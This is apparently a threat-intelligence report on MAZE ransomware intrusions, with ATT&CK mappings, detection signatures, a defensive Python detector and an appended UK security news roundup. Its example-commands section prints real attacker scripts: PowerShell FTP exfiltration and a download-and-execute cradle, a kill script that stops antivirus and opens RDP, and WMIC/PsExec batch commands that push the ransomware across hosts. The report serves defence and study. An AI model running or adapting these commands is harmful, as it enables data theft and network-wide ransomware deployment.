
      We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government, has been impacted, demonstrating the indiscriminate nature of these operations (Figure 1).


      Figure 1: Geographical and industry distribution of alleged MAZE victims

      Multiple Actors Involved in MAZE Ransomware Operations Identified

      Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (vs. commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


      Figure 2: MAZE ransomware panel

      MAZE Initially Distributed via Exploit Kits and Spam Campaigns

      MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

      On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


      Figure 3: German-language lure

      On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United States. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

      On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


      Figure 4: AT&T email lure


      Figure 5: Canada Post email lure

      Shift to Post-Compromise Distribution Maximizes Impact

      Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

      Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur because numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise and encryption has also varied widely, from weeks to many months.

      Initial Compromise

      There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

      • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
      • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
      • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
      • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

      Establish Foothold & Maintain Presence

      The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable latter-stage operations.

      • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
      • Web shells were deployed to an internet-facing system. The system-level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
      • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
      • An actor created a new domain account and added it to the domain administrators group.

      Escalate Privileges

      Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases via use of Bloodhound, and more manual searches for files containing credentials.

      • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
      • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
      • The actor attempted to identify hosts running the KeePass password safe software.
      • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
      • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

      Reconnaissance

      Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents may best highlight the divergent ways in which the responsible actors interact with victim networks.

      • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
      • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
      • Preliminary network reconnaissance was conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
      • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
      • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
      • An actor employed the adfind tool and a batch script to collect information about the victim's network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
      • An actor used the tool smbtools.exe to assess whether accounts could log in to systems across the environment.
      • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.

      Lateral Movement

      Across the majority of MAZE ransomware incidents lateral movement was accomplished via Cobalt Strike BEACON and using previously harvested credentials. Despite this uniformity, some alternative tools and approaches were also observed.

      • Attackers relied heavily on Cobalt Strike BEACON to move laterally across the impacted environment, though they also tunneled RDP using the ngrok utility, and employed tscon to hijack legitimate RDP sessions to enable both lateral movement and privilege escalation.
      • The actor moved laterally throughout some networks leveraging compromised service and user accounts obtained from the system on which they gained their initial foothold. This allowed them to obtain immediate access to additional systems. Stolen credentials were then used to move laterally across the network via RDP and to install BEACON payloads providing the actors with access to nearly one hundred hosts.
      • An actor moved laterally using Metasploit and later deployed a Cobalt Strike payload to a system using a local administrator account.
      • At least one actor attempted to perform lateral movement using EternalBlue in early and late 2019; however, there is no evidence that these attempts were successful.

      Complete Mission

      There was evidence suggesting data exfiltration across most analyzed MAZE ransomware incidents. While malicious actors could monetize stolen data in various ways (e.g. sale in an underground forum, fraud), actors employing MAZE are known to threaten the release of stolen data if victim organizations do not pay an extortion fee.

      • An actor has been observed exfiltrating data to FTP servers using a base64-encoded PowerShell script designed to upload any files with .7z file extensions to a predefined FTP server using a hard-coded username and password. This script appears to be a slight variant of a script first posted to Microsoft TechNet in 2013.
      • A different base64-encoded PowerShell command was also used to enable this functionality in a separate incident.
      • Actors deploying MAZE ransomware have also used the utility WinSCP to exfiltrate data to an attacker-controlled FTP server.
      • An actor has been observed employing a file replication utility and copying the stolen data to a cloud file hosting/sharing service.
      • Prior to deploying MAZE ransomware, threat actors employed the 7zip utility to archive data from across various corporate file shares. These archives were then exfiltrated to an attacker-controlled server via FTP using the WinSCP utility.

      In addition to data theft, actors deploy MAZE ransomware to encrypt files identified on the victim network. Notably, the aforementioned MAZE panel has an option to specify the date on which ransom demands will double, likely to create a sense of urgency around their demands.

      • Five days after data was exfiltrated from a victim environment the actor copied a MAZE ransomware binary to 15 hosts within the victim environment and successfully executed it on a portion of these systems.
      • Attackers employed batch scripts and a series of .txt files containing host names to distribute and execute MAZE ransomware on many servers and workstations across the victim environment.
      • An actor deployed MAZE ransomware to tens of hosts, explicitly logging into each system using a domain administrator account created earlier in the intrusion.
      • Immediately following the exfiltration of sensitive data, the actors began deployment of MAZE ransomware to hosts across the network. In some cases, thousands of hosts were ultimately encrypted. The encryption process proceeded as follows:
        • A batch script named start.bat was used to execute a series of secondary batch scripts with names such as xaa3x.bat or xab3x.bat.
        • Each of these batch scripts contained a series of commands that employed the copy command, WMIC, and PsExec to copy and execute a kill script (windows.bat) and an instance of MAZE ransomware (sss.exe) on hosts across the impacted environment.
        • Notably, forensic analysis of the impacted environment revealed MAZE deployment scripts targeting ten times as many hosts as were ultimately encrypted.

      Implications

      Based on our belief that the MAZE ransomware is distributed by multiple actors, we anticipate that the TTPs used throughout incidents associated with this ransomware will continue to vary somewhat, particularly in terms of the initial intrusion vector. For more comprehensive recommendations for addressing ransomware, please refer to our Ransomware Protection and Containment Strategies blog post and the linked white paper.

      Mandiant Security Validation Actions

      Organizations can validate their security controls against more than 20 MAZE-specific actions with Mandiant Security Validation. Please see our Headline Release Content Updates – April 21, 2020 on the Mandiant Security Validation Customer Portal for more information.

      • A100-877 - Active Directory - BloodHound, CollectionMethod All
      • A150-006 - Command and Control - BEACON, Check-in
      • A101-030 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #1
      • A101-031 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #2
      • A101-032 - Command and Control - MAZE Ransomware, C2 Beacon, Variant #3
      • A100-878 - Command and Control - MAZE Ransomware, C2 Check-in
      • A100-887 - Command and Control - MAZE, DNS Query #1
      • A100-888 - Command and Control - MAZE, DNS Query #2
      • A100-889 - Command and Control - MAZE, DNS Query #3
      • A100-890 - Command and Control - MAZE, DNS Query #4
      • A100-891 - Command and Control - MAZE, DNS Query #5
      • A100-509 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Github PoC
      • A100-339 - Exploit Kit Activity - Fallout Exploit Kit CVE-2018-8174, Landing Page
      • A101-033 - Exploit Kit Activity - Spelevo Exploit Kit, MAZE C2
      • A100-208 - FTP-based Exfil/Upload of PII Data (Various Compression)
      • A104-488 - Host CLI - Collection, Exfiltration: Active Directory Reconnaissance with SharpHound, CollectionMethod All
      • A104-046 - Host CLI - Collection, Exfiltration: Data from Local Drive using PowerShell
      • A104-090 - Host CLI - Collection, Impact: Creation of a Volume Shadow Copy
      • A104-489 - Host CLI - Collection: Privilege Escalation Check with PowerUp, Invoke-AllChecks
      • A104-037 - Host CLI - Credential Access, Discovery: File & Directory Discovery
      • A104-052 - Host CLI - Credential Access: Mimikatz
      • A104-167 - Host CLI - Credential Access: Mimikatz (2.1.1)
      • A104-490 - Host CLI - Defense Evasion, Discovery: Terminate Processes, Malware Analysis Tools
      • A104-491 - Host CLI - Defense Evasion, Persistence: MAZE, Create Target.lnk
      • A104-500 - Host CLI - Discovery, Defense Evasion: Debugger Detection
      • A104-492 - Host CLI - Discovery, Execution: Antivirus Query with WMI, PowerShell
      • A104-374 - Host CLI - Discovery: Enumerate Active Directory Forests
      • A104-493 - Host CLI - Discovery: Enumerate Network Shares
      • A104-481 - Host CLI - Discovery: Language Query Using PowerShell, Current User
      • A104-482 - Host CLI - Discovery: Language Query Using reg query
      • A104-494 - Host CLI - Discovery: MAZE, Dropping Ransomware Note Burn Directory
      • A104-495 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.html Variant
      • A104-496 - Host CLI - Discovery: MAZE, Traversing Directories and Dropping Ransomware Note, DECRYPT-FILES.txt Variant
      • A104-027 - Host CLI - Discovery: Process Discovery
      • A104-028 - Host CLI - Discovery: Process Discovery with PowerShell
      • A104-029 - Host CLI - Discovery: Remote System Discovery
      • A104-153 - Host CLI - Discovery: Security Software Identification with Tasklist
      • A104-083 - Host CLI - Discovery: System Info
      • A104-483 - Host CLI - Exfiltration: PowerShell FTP Upload
      • A104-498 - Host CLI - Impact: MAZE, Desktop Wallpaper Ransomware Message
      • A104-227 - Host CLI - Initial Access, Lateral Movement: Replication Through Removable Media
      • A100-879 - Malicious File Transfer - Adfind.exe, Download
      • A150-046 - Malicious File Transfer - BEACON, Download
      • A100-880 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp Executable Variant
      • A100-881 - Malicious File Transfer - Bloodhound Ingestor Download, C Sharp PowerShell Variant
      • A100-882 - Malicious File Transfer - Bloodhound Ingestor Download, PowerShell Variant
      • A101-037 - Malicious File Transfer - MAZE Download, Variant #1
      • A101-038 - Malicious File Transfer - MAZE Download, Variant #2
      • A101-039 - Malicious File Transfer - MAZE Download, Variant #3
      • A101-040 - Malicious File Transfer - MAZE Download, Variant #4
      • A101-041 - Malicious File Transfer - MAZE Download, Variant #5
      • A101-042 - Malicious File Transfer - MAZE Download, Variant #6
      • A101-043 - Malicious File Transfer - MAZE Download, Variant #7
      • A101-044 - Malicious File Transfer - MAZE Download, Variant #8
      • A101-045 - Malicious File Transfer - MAZE Download, Variant #9
      • A101-034 - Malicious File Transfer - MAZE Dropper Download, Variant #1
      • A101-035 - Malicious File Transfer - MAZE Dropper Download, Variant #2
      • A100-885 - Malicious File Transfer - MAZE Dropper Download, Variant #4
      • A101-036 - Malicious File Transfer - MAZE Ransomware, Malicious Macro, PowerShell Script Download
      • A100-284 - Malicious File Transfer - Mimikatz W/ Padding (1MB), Download
      • A100-886 - Malicious File Transfer - Rclone.exe, Download
      • A100-484 - Scanning Activity - Nmap smb-enum-shares, SMB Share Enumeration

      Detecting the Techniques

      Platform                                     Signature Name
      MVX (covers multiple FireEye technologies)   Bale Detection
                                                   FE_Ransomware_Win_MAZE_1
      Endpoint Security                            WMIC SHADOWCOPY DELETE (METHODOLOGY)
                                                   MAZE RANSOMWARE (FAMILY)
      Network Security                             Ransomware.Win.MAZE
                                                   Ransomware.Maze
                                                   Ransomware.Maze

      MITRE ATT&CK Mappings

      Mandiant currently tracks three separate clusters of activity involved in the post-compromise distribution of MAZE ransomware. Future data collection and analysis efforts may reveal additional groups involved in intrusion activity supporting MAZE operations, or may instead allow us to collapse some of these groups into larger clusters. It should also be noted that ‘initial access’ phase techniques have been included in these mappings, though in some cases this access may have been provided by a separate threat actor(s).

      MAZE Group 1 MITRE ATT&CK Mapping

      ATT&CK Tactic Category   Techniques
      Initial Access           T1133: External Remote Services; T1078: Valid Accounts
      Execution                T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
      Persistence              T1078: Valid Accounts; T1050: New Service
      Privilege Escalation     T1078: Valid Accounts
      Defense Evasion          T1078: Valid Accounts; T1036: Masquerading; T1027: Obfuscated Files or Information; T1064: Scripting
      Credential Access        T1110: Brute Force; T1003: Credential Dumping
      Discovery                T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery;
                               T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery;
                               T1016: System Network Configuration Discovery
      Lateral Movement         T1076: Remote Desktop Protocol; T1105: Remote File Copy
      Collection               T1005: Data from Local System
      Command and Control      T1043: Commonly Used Port; T1105: Remote File Copy; T1071: Standard Application Layer Protocol
      Exfiltration             T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
      Impact                   T1486: Data Encrypted for Impact; T1489: Service Stop

      MAZE Group 2 MITRE ATT&CK Mapping

      ATT&CK Tactic Category   Techniques
      Initial Access           T1193: Spearphishing Attachment
      Execution                T1059: Command-Line Interface; T1086: PowerShell; T1085: Rundll32; T1064: Scripting;
                               T1204: User Execution; T1028: Windows Remote Management
      Persistence              T1078: Valid Accounts; T1050: New Service; T1136: Create Account
      Privilege Escalation     T1078: Valid Accounts; T1050: New Service
      Defense Evasion          T1078: Valid Accounts; T1140: Deobfuscate/Decode Files or Information; T1107: File Deletion;
                               T1036: Masquerading
      Credential Access        T1003: Credential Dumping; T1081: Credentials in Files; T1171: LLMNR/NBT-NS Poisoning
      Discovery                T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery;
                               T1135: Network Share Discovery; T1069: Permission Groups Discovery; T1018: Remote System Discovery;
                               T1033: System Owner/User Discovery
      Lateral Movement         T1076: Remote Desktop Protocol; T1028: Windows Remote Management
      Collection               T1074: Data Staged; T1005: Data from Local System; T1039: Data from Network Shared Drive
      Command and Control      T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy;
                               T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
      Exfiltration             T1020: Automated Exfiltration; T1002: Data Compressed; T1048: Exfiltration Over Alternative Protocol
      Impact                   T1486: Data Encrypted for Impact

      MAZE Group 3 MITRE ATT&CK Mapping (FIN6)

      ATT&CK Tactic Category   Techniques
      Initial Access           T1133: External Remote Services; T1078: Valid Accounts
      Execution                T1059: Command-Line Interface; T1086: PowerShell; T1064: Scripting; T1035: Service Execution
      Persistence              T1078: Valid Accounts; T1031: Modify Existing Service
      Privilege Escalation     T1055: Process Injection; T1078: Valid Accounts
      Defense Evasion          T1055: Process Injection; T1078: Valid Accounts; T1116: Code Signing; T1089: Disabling Security Tools;
                               T1202: Indirect Command Execution; T1112: Modify Registry; T1027: Obfuscated Files or Information;
                               T1108: Redundant Access; T1064: Scripting
      Credential Access        T1003: Credential Dumping
      Discovery                T1087: Account Discovery; T1482: Domain Trust Discovery; T1083: File and Directory Discovery;
                               T1069: Permission Groups Discovery; T1018: Remote System Discovery
      Lateral Movement         T1097: Pass the Ticket; T1076: Remote Desktop Protocol; T1105: Remote File Copy; T1077: Windows Admin Shares
      Collection               T1074: Data Staged; T1039: Data from Network Shared Drive
      Command and Control      T1043: Commonly Used Port; T1219: Remote Access Tools; T1105: Remote File Copy;
                               T1071: Standard Application Layer Protocol; T1032: Standard Cryptographic Protocol
      Exfiltration             T1002: Data Compressed
      Impact                   T1486: Data Encrypted for Impact; T1490: Inhibit System Recovery; T1489: Service Stop

      Example Commands Observed in MAZE Ransomware Incidents

      function Enum-UsersFolders($PathEnum)
      {
          $foldersArr = 'Desktop','Downloads','Documents','AppData/Roaming','AppData/Local'

          Get-ChildItem -Path $PathEnum'/c$' -ErrorAction SilentlyContinue
          Get-ChildItem -Path $PathEnum'/c$/Program Files' -ErrorAction SilentlyContinue
          Get-ChildItem -Path $PathEnum'/c$/Program Files (x86)' -ErrorAction SilentlyContinue

          foreach($Directory in Get-ChildItem -Path $PathEnum'/c$/Users' -ErrorAction SilentlyContinue) {

              foreach($SeachDir in $foldersArr) {
                  Get-ChildItem -Path $PathEnum'/c$/Users/'$Directory'/'$SeachDir -ErrorAction SilentlyContinue
              }
          }
      }

      PowerShell reconnaissance script used to enumerate directories

      $Dir="C:/Windows/Temp/"
      #ftp server
      $ftp = "ftp://<IP Address>/incoming/"
      $user = "<username>"
      $pass = "<password>"
      $webclient = New-Object System.Net.WebClient
      $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass)
      #list every sql server trace file
      foreach($item in (dir $Dir "*.7z")){
         "Uploading $item..."
         $uri = New-Object System.Uri($ftp+$item.Name)
         $webclient.UploadFile($uri, $item.FullName)
      }

      Decoded FTP upload PowerShell script

      powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:43984/'); Add-FtpFile -ftpFilePath "ftp://<IP  Address>/cobalt_uploads/<file name>" -localFile "<local file path>\ <file name> " -userName "<username>" -password "<password>"

      Decoded FTP upload PowerShell script

      […]
      echo 7
      echo 7
      taskkill /im csrss_tc.exe /f
      taskkill /im kwsprod.exe /f
      taskkill /im avkwctl.exe /f
      taskkill /im rnav.exe /f
      taskkill /im crssvc.exe /f
      sc config CSAuth start= disabled
      taskkill /im vsserv.exe /f
      taskkill /im ppmcativedetection.exe /f
      […]
      taskkill /im sahookmain.exe /f
      taskkill /im mcinfo.exe /f
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      netsh advfirewall firewall set rule group="remote desktop" new enable=Ye
      c:\windows\temp\sss.exe

      Excerpt from windows.bat kill script

      start copy sss.exe \\<internal IP>\c$\windows\temp\
      start copy sss.exe \\<internal IP>\c$\windows\temp\

      start copy windows.bat \\<internal IP>\c$\windows\temp\
      start copy windows.bat \\<internal IP>\c$\windows\temp\

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "c:\windows\temp\sss.exe"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c c:\windows\temp\windows.bat"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\sss.exe c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

      start wmic /node:"<internal IP>" /user:"<DOMAIN\adminaccount>" /password:"<password>" process call create "cmd.exe /c copy \\<internal IP>\c$\windows\temp\windows.bat c:\windows\temp\"

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\sss.exe

      start psexec.exe \\<internal IP> -u <DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

      start psexec.exe \\<internal IP> -u < DOMAIN\adminaccount> -p "<password>" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat

      Example commands from MAZE distribution scripts

      @echo off
      del done.txt
      del offline.txt
      rem Loop thru list of computer names in file specified on command-line
      for /f %%i in (%1) do call :check_machine %%i
      goto end
      :check_machine
      rem Check to see if machine is up.
      ping -n 1 %1|Find "TTL=" >NUL 2>NUL
      if errorlevel 1 goto down
      echo %1
      START cmd /c "copy [Location of MAZE binary] \\%1\c$\windows\temp && exit"
      timeout 1 > NUL
      echo %1 >> done.txt
      rem wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" >> done.txt
      START "" cmd /c "wmic /node:"%1" process call create "regsvr32.exe /i C:\windows\temp\[MAZE binary name]" && exit"
      goto end
      :down
        rem Report machine down
        echo %1 >> offline.txt
      :end

      Example MAZE distribution script
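      To give defenders something concrete to run against the distribution pattern shown above, here is an added detection example; it is not code from the FireEye post or from the MAZE scripts. It applies narrow rules to constructed process-creation records and flags the behaviours the scripts depend on: staging a file into another host's C$\windows\temp, WMIC /node remote process creation, PsExec with a custom service name (rtrsd in the commands above) and regsvr32 /i launching a file from windows\temp. The host names, users, IPs, paths and the pipe-separated record format are assumptions made for the sample.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


# Constructed sample process-creation records (host|user|image|cmdline),
# loosely modelled on Security event 4688 / Sysmon event 1 fields.
# Hosts, users, IPs and paths are invented for this example.
SAMPLE_EVENTS = r"""
ws01|CORP\jsmith|C:\Windows\System32\cmd.exe|cmd.exe /c copy C:\Users\jsmith\report.docx \\fs01\share\
ws01|CORP\adminaccount|C:\Windows\System32\cmd.exe|cmd /c "copy C:\stage\sss.exe \\10.0.0.15\c$\windows\temp && exit"
ws01|CORP\adminaccount|C:\Windows\System32\wbem\WMIC.exe|wmic /node:"10.0.0.15" process call create "regsvr32.exe /i C:\windows\temp\sss.exe"
ws01|CORP\adminaccount|C:\Tools\psexec.exe|psexec.exe \\10.0.0.16 -u CORP\adminaccount -p "*" -d -h -r rtrsd -s -accepteula -nobanner c:\windows\temp\windows.bat
srv02|CORP\svc_backup|C:\Windows\System32\wbem\WMIC.exe|wmic os get caption
srv03|NT AUTHORITY\SYSTEM|C:\Windows\System32\regsvr32.exe|regsvr32.exe /i C:\windows\temp\sss.exe
"""

# Each rule is one behaviour the distribution scripts rely on. They are
# deliberately narrow: a plain "wmic os get caption" or a copy to an ordinary
# file share must not fire.
RULES = [
    # Staging a file into the C$ admin share's windows\temp on another host.
    ("admin_share_temp_staging",
     re.compile(r'\bcopy\b.*\\\\[^\\\s"]+\\c\$\\windows\\temp', re.I)),
    # Remote process creation via WMI: wmic /node:<host> process call create.
    ("wmic_remote_process_create",
     re.compile(r'\bwmic(\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b', re.I)),
    # PsExec run with a custom service name (-r), as with "rtrsd" in the scripts.
    ("psexec_custom_service_name",
     re.compile(r'\bpsexec(\.exe)?\b.*\s-r\s+\S+', re.I)),
    # regsvr32 /i installing a file dropped in windows\temp.
    ("regsvr32_install_from_temp",
     re.compile(r'\bregsvr32(\.exe)?\s+/i\s+\S*\\windows\\temp\\', re.I)),
]


def parse_events(text):
    """Turn the pipe-separated records into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        host, user, image, cmdline = line.split("|", 3)
        events.append({"host": host, "user": user, "image": image, "cmdline": cmdline})
    return events


def scan(events):
    """Apply every rule to every event; one Finding per (event, matching rule)."""
    findings = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                findings.append(Finding(ev["host"], ev["user"], name, ev["cmdline"]))
    return findings


def hosts_with_multiple_techniques(findings, min_rules=2):
    """Hosts on which at least min_rules distinct rules fired. A single hit may
    be legitimate admin work; several different ones from one source host look
    like the scripted fan-out shown above."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.rule)
    return {h for h, rules in by_host.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    results = scan(parse_events(SAMPLE_EVENTS))
    for f in results:
        print(f"{f.host:6} {f.user:22} {f.rule:28} {f.cmdline}")
    print("likely distribution hosts:", hosts_with_multiple_techniques(results))
```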

      Indicators of Compromise (Maze payloads, Maze check-in IPs, Maze-related domains, Maze download URLs, malicious documents, BEACON C2s, Cobalt Strike binaries, Meterpreter C2s, other related files, tools & utilities, email sender domains, sender domain registrant addresses)

      Mandiant Threat Intelligence will host an exclusive webinar on Thursday, May 21, 2020, at 8 a.m. PT / 11 a.m. ET to provide updated insight and information into the MAZE ransomware threat, and to answer questions from attendees. Register today to reserve your spot.

      Cyber Security Roundup for May 2020

      A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

      As well reported, UK foreign exchange firm Travelex's business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that the REvil group were behind the attack and had stolen 5Gbs of customer personal data, and then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to an inflation of future cyber-extortion demands in my opinion.

      Cognizant, a large US digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware. Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack, not only encrypts the victim's files but steals sensitive data from the IT systems as well, enabling the bad guys to threaten to publish the stolen data if the organisation doesn't cough up to their cyber-extortion demands; the bad guys are very much rinsing and repeating lucrative attacks.

      Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads. The blog covers ransomware payloads said to be straining security operations, especially in health care; Microsoft urged security teams to look for signs of credential theft and lateral movement activity that herald attacks.

      Researchers continue to be busy exposing large sensitive datasets within misconfigured cloud services. In April researchers reported 14 million Ring user details exposed in a misconfigured open AWS database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

